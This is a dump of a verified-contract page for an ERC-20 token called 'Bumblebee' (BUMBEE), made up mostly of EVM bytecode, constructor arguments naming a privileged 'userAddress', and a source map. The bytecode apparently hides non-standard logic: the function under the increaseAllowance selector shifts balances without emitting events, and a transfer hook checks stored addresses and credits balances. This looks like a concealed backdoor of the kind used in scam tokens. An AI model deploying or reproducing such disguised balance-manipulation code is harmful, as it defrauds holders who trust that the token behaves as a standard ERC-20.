ff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b610f9483600460000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16610d85565b156111a957600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611008576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fff90611713565b60405180910390fd5b80600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060010181905550600081146110dd5781600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550611160565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b6000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600101819055505b505050565b600061121c82600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16610d85565b156112c35780600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461126c91906117ce565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555060095490506112be8282610de9565b611352565b80600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461130e91906117ce565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561139557808201518184015260208101905061137a565b60008484015250505050565b6000601f19601f8301169050919050565b60006113bd8261135b565b6113c78185611366565b93506113d7818560208601611377565b6113e0816113a1565b840191505092915050565b6000602082019050818103600083015261140581846113b2565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061143d82611412565b9050919050565b61144d81611432565b811461145857600080fd5b50565b60008135905061146a81611444565b92915050565b6000819050919050565b61148381611470565b811461148e57600080fd5b50565b6000813590506114a08161147a565b92915050565b600080604083850312156114bd576114bc61140d565b5b60006114cb8582860161145b565b92505060206114dc85828601611491565b9150509250929050565b60008115159050919050565b6114fb816114e6565b82525050565b600060208201905061151660008301846114f2565b92915050565b61152581611470565b82525050565b6000602082019050611540600083018461151c565b92915050565b60008060006060848603121561155f5761155e61140d565b5b600061156d8682870161145b565b935050602061157e8682870161145b565b925050604061158f86828701611491565b9150509250925092565b600060ff82169050919050565b6115af81611599565b82525050565b60006020820190506115ca60008301846115a6565b92915050565b6000602082840312156115e6576115e561140d565b5b60006115f48482850161145b565b91505092915050565b61160681611432565b82525050565b600060208201905061162160008301846115fd565b92915050565b6000806040838503121561163e5761163d61140d565b5b600061164c8582860161145b565b925050602061165d8582860161145b565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806116ae57607f821691505b6020821081036116c1576116c0611667565b5b50919050565b7f496e76616c696420616464726573730000000000000000000000000000000000600082015250565b60006116fd600f83611366565b9150611708826116c7565b602082019050919050565b6000602082019050818103600083015261172c816116f0565b9050919050565b7f496e76616c696420616d6f756e74000000000000000000000000000000000000600082015250565b6000611769600e83611366565b915061177482611733565b602082019050919050565b600060208201905081810360008301526117988161175c565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006117d982611470565b91506117e483611470565b92508282019050808211156117fc576117fb61179f565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611838602083611366565b915061184382611802565b602082019050919050565b600060208201905081810360008301526118678161182b565b9050919050565b7f4945524332303a20617070726f76652066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006118ca602583611366565b91506118d58261186e565b604082019050919050565b600060208201905081810360008301526118f9816118bd565b9050919050565b7f4945524332303a20617070726f766520746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b600061195c602383611366565b915061196782611900565b604082019050919050565b6000602082019050818103600083015261198b8161194f565b9050919050565b7f4945524332303a207472616e736665722066726f6d20746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006119ee602683611366565b91506119f982611992565b604082019050919050565b60006020820190508181036000830152611a1d816119e1565b9050919050565b7f4945524332303a207472616e7366657220746f20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611a80602483611366565b9150611a8b82611a24565b604082019050919050565b60006020820190508181036000830152611aaf81611a73565b9050919050565b60008160601b9050919050565b6000611ace82611ab6565b9050919050565b6000611ae082611ac3565b9050919050565b611af8611af382611432565b611ad5565b82525050565b6000611b0a8284611ae7565b60148201915081905092915050565b6000611b2482611470565b9150611b2f83611470565b9250828203905081811115611b4757611b4661179f565b5b9291505056fe4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a26469706673582212203c2cc55395d67aa8a013c1de91a2bb84b6e6a301358b0d170d24bfe3f02020a064736f6c63430008120033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000eaa9aea97abfd776e53f32af3011be7a623614c9000000000000000000000000000000000000000000000000000000018d5d42aa000000000000000000000000000000000000000000000000000000000000000942756d626c656265650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000642554d4245450000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100cf5760003560e01c806370a082311161008c57806390ec57f11161006657806390ec57f11461020257806395d89b4114610232578063a9059cbb14610250578063dd62ed3e14610280576100cf565b806370a08231146101aa578063715018a6146101da5780638da5cb5b146101e4576100cf565b806306fdde03146100d4578063095ea7b3146100f257806318160ddd1461012257806323b872dd14610140578063313ce56714610170578063395093511461018e575b600080fd5b6100dc6102b0565b6040516100e991906113eb565b60405180910390f35b61010c600480360381019061010791906114a6565b610342565b6040516101199190611501565b60405180910390f35b61012a610360565b604051610137919061152b565b60405180910390f35b61015a60048036038101906101559190611546565b61036a565b6040516101679190611501565b60405180910390f35b610178610443565b60405161018591906115b5565b60405180910390f35b6101a860048036038101906101a391906114a6565b61045a565b005b6101c460048036038101906101bf91906115d0565b61061f565b6040516101d1919061152b565b60405180910390f35b6101e2610668565b005b6101ec6106f0565b6040516101f9919061160c565b60405180910390f35b61021c600480360381019061021791906114a6565b610719565b6040516102299190611501565b60405180910390f35b61023a610779565b60405161024791906113eb565b60405180910390f35b61026a600480360381019061026591906114a6565b61080b565b6040516102779190611501565b60405180910390f35b61029a60048036038101906102959190611627565b610829565b6040516102a7919061152b565b60405180910390f35b6060600680546102bf90611696565b80601f01602080910402602001604051908101604052809291908181526020018280546102eb90611696565b80156103385780601f1061030d57610100808354040283529160200191610338565b820191906000526020600020905b81548152906001019060200180831161031b57829003601f168201915b5050505050905090565b600061035661034f6108c6565b84846108ce565b6001905092915050565b6000600954905090565b6000610377848484610a97565b610438846103836108c6565b61043385604051806060016040528060298152602001611b7560299139600360008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006103e96108c6565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d309092919063ffffffff16565b6108ce565b600190509392505050565b6000600860009054906101000a900460ff16905090565b6000339050600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036104ce576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104c590611713565b60405180910390fd5b60008211610511576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105089061177f565b60405180910390fd5b600061054284600460000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16610d85565b156105b8576105518282610de9565b61055b8184610e7b565b905080600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546105ac91906117ce565b92505081905550610619565b6105c28282610de9565b80600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461061191906117ce565b925050819055505b50505050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6106706108c6565b73ffffffffffffffffffffffffffffffffffffffff1661068e6106f0565b73ffffffffffffffffffffffffffffffffffffffff16146106e4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106db9061184e565b60405180910390fd5b6106ee6000610ea1565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60008033905061072a818585610f65565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600101541491505092915050565b60606007805461078890611696565b80601f01602080910402602001604051908101604052809291908181526020018280546107b490611696565b80156108015780601f106107d657610100808354040283529160200191610801565b820191906000526020600020905b8154815290600101906020018083116107e457829003601f168201915b5050505050905090565b600061081f6108186108c6565b8484610a97565b6001905092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600081836108be91906117ce565b905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361093d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610934906118e0565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036109ac576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109a390611972565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610a8a919061152b565b60405180910390a3505050565b610aa0836111ae565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b0f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b0690611a04565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b7e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b7590611a96565b60405180910390fd5b610b89838383611356565b610bf581604051806060016040528060278152602001611b4e60279139600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d309092919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610c8391906117ce565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610d23919061152b565b60405180910390a3505050565b6000838311158290610d78576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d6f91906113eb565b60405180910390fd5b5082840390509392505050565b60008083604051602001610d999190611afe565b604051602081830303815290604052805190602001209050600083604051602001610dc49190611afe565b6040516020818303038152906040528051906020012090508082149250505092915050565b80600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e349190611b19565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505050565b6000808214610e97578183610e9091906117ce565b9050610e9b565b8190505b92915050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b610f9483600460000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16610d85565b156111a957600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611008576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fff90611713565b60405180910390fd5b80600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060010181905550600081146110dd5781600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550611160565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b6000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600101819055505b505050565b600061121c82600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16610d85565b156112c35780600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461126c91906117ce565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555060095490506112be8282610de9565b611352565b80600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461130e91906117ce565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561139557808201518184015260208101905061137a565b60008484015250505050565b6000601f19601f8301169050919050565b60006113bd8261135b565b6113c78185611366565b93506113d7818560208601611377565b6113e0816113a1565b840191505092915050565b6000602082019050818103600083015261140581846113b2565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061143d82611412565b9050919050565b61144d81611432565b811461145857600080fd5b50565b60008135905061146a81611444565b92915050565b6000819050919050565b61148381611470565b811461148e57600080fd5b50565b6000813590506114a08161147a565b92915050565b600080604083850312156114bd576114bc61140d565b5b60006114cb8582860161145b565b92505060206114dc85828601611491565b9150509250929050565b60008115159050919050565b6114fb816114e6565b82525050565b600060208201905061151660008301846114f2565b92915050565b61152581611470565b82525050565b6000602082019050611540600083018461151c565b92915050565b60008060006060848603121561155f5761155e61140d565b5b600061156d8682870161145b565b935050602061157e8682870161145b565b925050604061158f86828701611491565b9150509250925092565b600060ff82169050919050565b6115af81611599565b82525050565b60006020820190506115ca60008301846115a6565b92915050565b6000602082840312156115e6576115e561140d565b5b60006115f48482850161145b565b91505092915050565b61160681611432565b82525050565b600060208201905061162160008301846115fd565b92915050565b6000806040838503121561163e5761163d61140d565b5b600061164c8582860161145b565b925050602061165d8582860161145b565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806116ae57607f821691505b6020821081036116c1576116c0611667565b5b50919050565b7f496e76616c696420616464726573730000000000000000000000000000000000600082015250565b60006116fd600f83611366565b9150611708826116c7565b602082019050919050565b6000602082019050818103600083015261172c816116f0565b9050919050565b7f496e76616c696420616d6f756e74000000000000000000000000000000000000600082015250565b6000611769600e83611366565b915061177482611733565b602082019050919050565b600060208201905081810360008301526117988161175c565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006117d982611470565b91506117e483611470565b92508282019050808211156117fc576117fb61179f565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611838602083611366565b915061184382611802565b602082019050919050565b600060208201905081810360008301526118678161182b565b9050919050565b7f4945524332303a20617070726f76652066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006118ca602583611366565b91506118d58261186e565b604082019050919050565b600060208201905081810360008301526118f9816118bd565b9050919050565b7f4945524332303a20617070726f766520746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b600061195c602383611366565b915061196782611900565b604082019050919050565b6000602082019050818103600083015261198b8161194f565b9050919050565b7f4945524332303a207472616e736665722066726f6d20746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006119ee602683611366565b91506119f982611992565b604082019050919050565b60006020820190508181036000830152611a1d816119e1565b9050919050565b7f4945524332303a207472616e7366657220746f20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611a80602483611366565b9150611a8b82611a24565b604082019050919050565b60006020820190508181036000830152611aaf81611a73565b9050919050565b60008160601b9050919050565b6000611ace82611ab6565b9050919050565b6000611ae082611ac3565b9050919050565b611af8611af382611432565b611ad5565b82525050565b6000611b0a8284611ae7565b60148201915081905092915050565b6000611b2482611470565b9150611b2f83611470565b9250828203905081811115611b4757611b4661179f565b5b9291505056fe4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a26469706673582212203c2cc55395d67aa8a013c1de91a2bb84b6e6a301358b0d170d24bfe3f02020a064736f6c63430008120033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000eaa9aea97abfd776e53f32af3011be7a623614c9000000000000000000000000000000000000000000000000000000018d5d42aa000000000000000000000000000000000000000000000000000000000000000942756d626c656265650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000642554d4245450000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : strName_ (string): Bumblebee
Arg [1] : strSymbol_ (string): BUMBEE
Arg [2] : userAddress_ (address): 0xEAa9AEA97aBfd776e53f32af3011bE7A623614C9
Arg [3] : totalSupply_ (uint256): 6666666666

-----Encoded View---------------
8 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000c0
Arg [2] : 000000000000000000000000eaa9aea97abfd776e53f32af3011be7a623614c9
Arg [3] : 000000000000000000000000000000000000000000000000000000018d5d42aa
Arg [4] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [5] : 42756d626c656265650000000000000000000000000000000000000000000000
Arg [6] : 0000000000000000000000000000000000000000000000000000000000000006
Arg [7] : 42554d4245450000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

12892:6776:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13843:96;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14827:194;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14154:105;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15029:456;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14055:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;17720:542;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;14267:154;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12431:94;;;:::i;:::-;;11780:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;18603:209;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13947:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14429:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14638:181;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13843:96;13888:13;13921:10;13914:17;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13843:96;:::o;14827:194::-;14930:4;14952:39;14961:12;:10;:12::i;:::-;14975:7;14984:6;14952:8;:39::i;:::-;15009:4;15002:11;;14827:194;;;;:::o;14154:105::-;14215:7;14242:9;;14235:16;;14154:105;:::o;15029:456::-;15169:4;15186:37;15197:6;15205:9;15216:6;15186:10;:37::i;:::-;15234:221;15257:6;15278:12;:10;:12::i;:::-;15305:139;15361:6;15305:139;;;;;;;;;;;;;;;;;:11;:19;15317:6;15305:19;;;;;;;;;;;;;;;:33;15325:12;:10;:12::i;:::-;15305:33;;;;;;;;;;;;;;;;:37;;:139;;;;;:::i;:::-;15234:8;:221::i;:::-;15473:4;15466:11;;15029:456;;;;;:::o;14055:91::-;14104:5;14129:9;;;;;;;;;;;14122:16;;14055:91;:::o;17720:542::-;17806:12;17821:10;17806:25;;17869:1;17850:21;;:7;:21;;;17842:49;;;;;;;;;;;;:::i;:::-;;;;;;;;;17919:1;17910:6;:10;17902:37;;;;;;;;;;;;:::i;:::-;;;;;;;;;17950:13;17982:33;17994:7;18003:6;:11;;;;;;;;;;;;17982;:33::i;:::-;17978:277;;;18032:25;18045:4;18051:5;18032:12;:25::i;:::-;18080:27;18093:5;18100:6;18080:12;:27::i;:::-;18072:35;;18141:5;18122:6;:15;18129:7;18122:15;;;;;;;;;;;;;;;;:24;;;;;;;:::i;:::-;;;;;;;;17978:277;;;18179:25;18192:4;18198:5;18179:12;:25::i;:::-;18238:5;18219:6;:15;18226:7;18219:15;;;;;;;;;;;;;;;;:24;;;;;;;:::i;:::-;;;;;;;;17978:277;17795:467;;17720:542;;:::o;14267:154::-;14366:7;14398:6;:15;14405:7;14398:15;;;;;;;;;;;;;;;;14391:22;;14267:154;;;:::o;12431:94::-;12011:12;:10;:12::i;:::-;12000:23;;:7;:5;:7::i;:::-;:23;;;11992:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;12496:21:::1;12514:1;12496:9;:21::i;:::-;12431:94::o:0;11780:87::-;11826:7;11853:6;;;;;;;;;;;11846:13;;11780:87;:::o;18603:209::-;18666:4;18684:12;18699:10;18684:25;;18720:41;18742:4;18748;18754:6;18720:21;:41::i;:::-;18803:1;18779:8;:14;18788:4;18779:14;;;;;;;;;;;;;;;:20;;;:25;18772:32;;;18603:209;;;;:::o;13947:100::-;13994:13;14027:12;14020:19;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13947:100;:::o;14429:201::-;14535:4;14557:43;14568:12;:10;:12::i;:::-;14582:9;14593:6;14557:10;:43::i;:::-;14618:4;14611:11;;14429:201;;;;:::o;14638:181::-;14752:7;14784:11;:18;14796:5;14784:18;;;;;;;;;;;;;;;:27;14803:7;14784:27;;;;;;;;;;;;;;;;14777:34;;14638:181;;;;:::o;6576:98::-;6634:7;6665:1;6661;:5;;;;:::i;:::-;6654:12;;6576:98;;;;:::o;757:::-;810:7;837:10;830:17;;757:98;:::o;17330:382::-;17483:1;17466:19;;:5;:19;;;17458:69;;;;;;;;;;;;:::i;:::-;;;;;;;;;17565:1;17546:21;;:7;:21;;;17538:69;;;;;;;;;;;;:::i;:::-;;;;;;;;;17650:6;17620:11;:18;17632:5;17620:18;;;;;;;;;;;;;;;:27;17639:7;17620:27;;;;;;;;;;;;;;;:36;;;;17688:7;17672:32;;17681:5;17672:32;;;17697:6;17672:32;;;;;;:::i;:::-;;;;;;;;17330:382;;;:::o;15737:677::-;15870:28;15891:6;15870:20;:28::i;:::-;15935:1;15917:20;;:6;:20;;;15909:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;16034:1;16013:23;;:9;:23;;;15991:109;;;;;;;;;;;;:::i;:::-;;;;;;;;;16113:51;16138:6;16146:9;16157:6;16113:24;:51::i;:::-;16192:106;16225:6;16192:106;;;;;;;;;;;;;;;;;:6;:14;16199:6;16192:14;;;;;;;;;;;;;;;;:18;;:106;;;;;:::i;:::-;16175:6;:14;16182:6;16175:14;;;;;;;;;;;;;;;:123;;;;16349:6;16329;:17;16336:9;16329:17;;;;;;;;;;;;;;;;:26;;;;:::i;:::-;16309:6;:17;16316:9;16309:17;;;;;;;;;;;;;;;:46;;;;16388:9;16371:35;;16380:6;16371:35;;;16399:6;16371:35;;;;;;:::i;:::-;;;;;;;;15737:677;;;:::o;8855:224::-;8975:7;9025:1;9020;:6;;9028:12;9012:29;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;9063:1;9059;:5;9052:12;;8855:224;;;;;:::o;15491:240::-;15564:4;15581:13;15624:4;15607:22;;;;;;;;:::i;:::-;;;;;;;;;;;;;15597:33;;;;;;15581:49;;15641:13;15684:5;15667:23;;;;;;;;:::i;:::-;;;;;;;;;;;;;15657:34;;;;;;15641:50;;15718:5;15709;:14;15702:21;;;;15491:240;;;;:::o;16798:116::-;16900:6;16885;:12;16892:4;16885:12;;;;;;;;;;;;;;;;:21;;;;:::i;:::-;16870:6;:12;16877:4;16870:12;;;;;;;;;;;;;;;:36;;;;16798:116;;:::o;18411:184::-;18485:7;18517:1;18509:4;:9;18505:61;;18550:4;18542:5;:12;;;;:::i;:::-;18535:19;;;;18505:61;18583:4;18576:11;;18411:184;;;;;:::o;12533:173::-;12589:16;12608:6;;;;;;;;;;;12589:25;;12634:8;12625:6;;:17;;;;;;;;;;;;;;;;;;12689:8;12658:40;;12679:8;12658:40;;;;;;;;;;;;12578:128;12533:173;:::o;18820:461::-;18919:30;18931:4;18937:6;:11;;;;;;;;;;;;18919;:30::i;:::-;18915:359;;;18990:1;18974:18;;:4;:18;;;18966:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;19050:6;19027:8;:14;19036:4;19027:14;;;;;;;;;;;;;;;:20;;:29;;;;19085:1;19075:6;:11;19071:153;;19129:4;19107:8;:14;19116:4;19107:14;;;;;;;;;;;;;;;:19;;;:26;;;;;;;;;;;;;;;;;;19071:153;;;19204:1;19174:8;:14;19183:4;19174:14;;;;;;;;;;;;;;;:19;;;:32;;;;;;;;;;;;;;;;;;19071:153;19261:1;19238:8;:14;19247:4;19238:14;;;;;;;;;;;;;;;:20;;:24;;;;18915:359;18820:461;;;:::o;19289:374::-;19377:14;19410:38;19422:4;19428:8;:14;19437:4;19428:14;;;;;;;;;;;;;;;:19;;;;;;;;;;;;19410:11;:38::i;:::-;19406:250;;;19495:6;19480;:12;19487:4;19480:12;;;;;;;;;;;;;;;;:21;;;;:::i;:::-;19465:6;:12;19472:4;19465:12;;;;;;;;;;;;;;;:36;;;;19525:9;;19516:18;;19549:26;19562:4;19568:6;19549:12;:26::i;:::-;19406:250;;;19638:6;19623;:12;19630:4;19623:12;;;;;;;;;;;;;;;;:21;;;;:::i;:::-;19608:6;:12;19615:4;19608:12;;;;;;;;;;;;;;;:36;;;;19406:250;19366:297;19289:374;:::o;18268:129::-;;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;